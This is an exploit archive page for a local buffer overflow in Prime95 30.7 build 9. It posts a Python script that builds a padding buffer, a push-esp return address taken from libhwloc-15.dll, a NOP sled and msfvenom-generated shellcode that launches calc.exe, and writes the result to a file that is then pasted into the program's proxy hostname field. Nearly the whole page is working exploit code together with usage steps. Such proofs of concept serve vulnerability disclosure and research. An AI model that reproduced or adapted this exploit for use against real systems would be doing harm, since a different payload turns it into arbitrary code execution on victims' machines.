exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Prime95 30.7 Build 9 Buffer Overflow

Prime95 30.7 Build 9 Buffer Overflow
Posted Apr 27, 2022
Authored by Yehia Elghaly

Prime95 version 30.7 build 9 suffers from a buffer overflow vulnerability.

tags | exploit, overflow
SHA-256 | 79bac0b7ca9b464728e6052f0272701247728bd55953b88870a22da80055f1bc

Prime95 30.7 Build 9 Buffer Overflow

Change Mirror Download
# Exploit Title:   Prime95 Version 30.7 build 9 Buffer Overflow RCE
# Discovered by: Yehia Elghaly
# Discovered Date: 2022-04-25
# Vendor Homepage: https://www.mersenne.org/
# Software Link : https://www.mersenne.org/ftp_root/gimps/p95v307b9.win32.zip
# Tested Version: 30.7 build 9
# Vulnerability Type: Buffer Overflow (RCE) Local
# Tested on OS: Windows 7 Professional x86

# Description: Prime95 Version 30.7 build 9 Buffer Overflow RCE

# 1- How to use: open the program go to test-PrimeNet-check the square-Connections
# 2- paste the contents of open.txt in the optional proxy hostname field and the calculator will open

buffer = "A" * 144
jum = "\xd8\x29\xe7\x6e" #push esp # ret | {PAGE_EXECUTE_READ} [libhwloc-15.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\ex\libhwloc-15.dll)
nop = "\x90" * 20 #Nob
hot = "C" * 100

#sudo msfvenom -p windows/exec CMD=calc.exe -b "\x00\x09\x0A\x0d" -f python -v payload
payload = b""
payload += b"\xbb\x72\xd7\x5d\x16\xdb\xc0\xd9\x74\x24\xf4\x5d"
payload += b"\x29\xc9\xb1\x31\x83\xc5\x04\x31\x5d\x0f\x03\x5d"
payload += b"\x7d\x35\xa8\xea\x69\x3b\x53\x13\x69\x5c\xdd\xf6"
payload += b"\x58\x5c\xb9\x73\xca\x6c\xc9\xd6\xe6\x07\x9f\xc2"
payload += b"\x7d\x65\x08\xe4\x36\xc0\x6e\xcb\xc7\x79\x52\x4a"
payload += b"\x4b\x80\x87\xac\x72\x4b\xda\xad\xb3\xb6\x17\xff"
payload += b"\x6c\xbc\x8a\x10\x19\x88\x16\x9a\x51\x1c\x1f\x7f"
payload += b"\x21\x1f\x0e\x2e\x3a\x46\x90\xd0\xef\xf2\x99\xca"
payload += b"\xec\x3f\x53\x60\xc6\xb4\x62\xa0\x17\x34\xc8\x8d"
payload += b"\x98\xc7\x10\xc9\x1e\x38\x67\x23\x5d\xc5\x70\xf0"
payload += b"\x1c\x11\xf4\xe3\x86\xd2\xae\xcf\x37\x36\x28\x9b"
payload += b"\x3b\xf3\x3e\xc3\x5f\x02\x92\x7f\x5b\x8f\x15\x50"
payload += b"\xea\xcb\x31\x74\xb7\x88\x58\x2d\x1d\x7e\x64\x2d"
payload += b"\xfe\xdf\xc0\x25\x12\x0b\x79\x64\x78\xca\x0f\x12"
payload += b"\xce\xcc\x0f\x1d\x7e\xa5\x3e\x96\x11\xb2\xbe\x7d"
payload += b"\x56\x4c\xf5\xdc\xfe\xc5\x50\xb5\x43\x88\x62\x63"
payload += b"\x87\xb5\xe0\x86\x77\x42\xf8\xe2\x72\x0e\xbe\x1f"
payload += b"\x0e\x1f\x2b\x20\xbd\x20\x7e\x43\x20\xb3\xe2\xaa"
payload += b"\xc7\x33\x80\xb2"

evil = buffer + jum + nop + payload

file = open('PExploit.txt','w+')
file.write(evil)
file.close()
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close